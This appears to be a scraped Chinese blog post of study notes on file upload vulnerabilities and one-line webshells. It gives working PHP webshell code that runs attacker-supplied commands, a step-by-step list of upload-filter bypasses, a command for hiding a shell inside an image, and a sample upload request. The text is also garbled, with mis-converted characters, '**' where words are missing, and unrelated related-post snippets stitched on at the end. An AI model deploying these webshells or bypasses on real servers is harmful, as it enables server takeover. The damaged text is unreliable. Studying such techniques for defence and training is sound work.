檔案上傳漏洞 一句話木馬 學習筆記

2021-10-23 15:20:46 字數 2478 閱讀 2135

滲webshell就是以asp、php、jsp或者cgi等網頁檔案形式存在的一種命令執行環境,也可以將其稱做為一種網頁後門。黑客在入侵了乙個**後,通常會將asp或php後門檔案與**伺服器web目錄下正常的網頁檔案混在一起,然後就可以使用瀏覽器來訪問asp或者php後門,得到乙個命令執行環境,以達到控制**伺服器的目的。

顧名思義,「web」的含義是顯然需要伺服器開放web服務,「shell」的含義是取得對伺服器某種程度上操作許可權。webshell常常被稱為入侵者通過**埠對**伺服器的某種程度上操作的許可權。由於webshell其大多是以動態指令碼的形式出現,也有人稱之為**的後門工具。

在很多的滲透過程中,滲透人員會上傳一句話木馬(簡稱webshell)到目前web服務目錄繼而提權獲取系統權

限,不論asp、php、jsp、aspx都是如此,那麼一句話木馬到底是什麼呢? 先來看看最簡單的一句話木馬:

<?php @eval

($_post

['attack'])

?>

利用檔案上傳漏洞,往目標**中上傳一句話木馬,然後你就可以在本地通過蟻劍(菜刀)即可獲取和控制整

個**目錄。@表示後面即使執行錯誤,也不報錯。eval()函式表示括號內的語句字串什麼的全都當做**執行。$_post['attack']表示從頁面中獲得attack這 個引數值。

其中,只要攻擊者滿足三個條件,就能實現成功入侵:

① 木馬上傳成功,未被殺;

② 知道木馬的路徑在哪;

③ 上傳的木馬能正常執行。

php:<?php @eval($_post['pass']);?><?php system($_get['cmd']);?>

asp:

aspx:

利用蟻劍高效控制shell,對伺服器進行高 效率滲透

web容器是一種服務程式,在伺服器乙個埠就有乙個提供相應服務的程式,而這個程式就是處理

從客戶端發出的請求,如tomcat、apache、nginx等等。(可以理解為給程式語言提供環境)

提供系統軟體和應用軟體之間連線的軟體,以便於軟體各部件之間的溝通。中介軟體處在作業系統和

更高一級應用程式之間。

當伺服器接收到乙個http請求的時候,iis首先需要決定如何去處理這個請求(伺服器處理.aspx

.html肯定是不一樣的),根據的是檔案的字尾名。

檔案上傳漏洞是指由於程式設計師在對使用者檔案上傳部分的控制不足或者處理缺陷,而導致的使用者可以越過其本身許可權向伺服器上上傳可執行的動態指令碼檔案。這裡上傳的檔案可以是木馬,病毒,惡意腳 本或者webshell等。

01是前端js判斷是否為利用抓包修改檔名

02是判斷content-type,於是修改content-type繞過。

不允許上傳.asp,.aspx,.php,.jsp字尾檔案,利用php3、phtml字尾繞過。

利用.htaccess檔案,將所有檔案解析為php。

05info.php大小寫繞過

06info.php字尾名中加空格繞過

07info.php.字尾加「.」繞過【利用windows特性,會自動去掉字尾名中最後的」.」】

(linux中無效)

08info.php::$data利用這個特性將字尾改為.php::$data可以直接繞過檢查(linux無效)

cmd命令:copy a.jpg /b + shell.php /a webshell.jpg

a. 通過讀檔案的前2個位元組判斷檔案型別

b. 利用gif頭「gif89a」

利用.htaccess檔案,解析所有型別檔案為php

上傳馬

------webkitformboundarypadyiq2vuzu31amf

content-disposition: form-data; name="file"; filename="file.gif"

content-type: image/gif

gif89a

<?php phpinfo();?>

------webkitformboundarypadyiq2vuzu31amf--

練習**:

上傳漏洞和他的一句話木馬

5.標頭檔案檢查 6.00截斷 函式替換 asp一句話木馬 execute request value php一句話木馬 aspx一句話木馬 page language jscript eval request.item value htaccess檔案 或者 分布式配置檔案 全稱是hypertex...

一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用。一句話木馬 服務端 是用於本地的html提交指令碼木馬檔案 就是我們要用來插入到asp檔案中的asp語句,不僅僅是以asp為字尾的資料庫檔案 該語句將回為觸發,接收入侵者通過客戶端提交的資料,執行並完成相應的操作,服務端的...

關於一句話木馬

這裡的asp後門不指像那些一句話木馬 砍客 冰狐之類的b s型的,只指像cmd.asp或2005a.asp的。第乙個,來看zzzeva免fso的cmd.asp 如下 是不是覺得有點長了?在注入時寫有點不好寫。那來改一下。第二個,更改zzzeva免fso的cmd.asp 如下 response.wri...